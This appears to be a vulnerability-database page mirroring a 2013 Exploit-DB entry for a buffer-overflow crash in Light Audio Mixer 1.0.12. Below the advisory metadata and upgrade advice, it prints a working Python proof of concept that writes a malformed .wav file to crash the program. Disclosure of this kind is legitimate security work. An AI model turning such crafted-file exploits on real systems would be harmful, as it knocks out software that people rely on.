header-logo
Suggest Exploit
vendor:
Light Audio Mixer
by:
ariarat
7,5
CVSS
HIGH
Crash
119
CWE
Product Name: Light Audio Mixer
Affected Version From: 1.0.12
Affected Version To: 1.0.12
Patch Exists: YES
Related CWE: N/A
CPE: a:light_audio_mixer:light_audio_mixer:1.0.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp3
2013

Light Audio Mixer Version 1.0.12 (.wav) – Crash POC

Light Audio Mixer Version 1.0.12 is vulnerable to a crash due to a buffer overflow. After creating a PoC file (.wav), dragging it to the Play List and choosing a Deck (if present) and pressing OK will cause the application to crash.

Mitigation:

Upgrade to the latest version of Light Audio Mixer.
Source

Exploit-DB raw data:

# Exploit Title: Light Audio Mixer Version 1.0.12 (.wav) - Crash POC
# Date: 14-07-2013
# Exploit Author: ariarat
# Software Link: http://download.cnet.com/Light-Audio-Mixer/3000-2139_4-10791607.html
# Version: 1.0.12
# Tested on: [ Windows XP sp3]
#============================================================================================
# After creating PoC file.(.wav),drag it to Play List and choose a Deck(if present) and press OK!
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

filename = "PoC.wav"
file = open(filename , "w")
file.write(string)
file.close()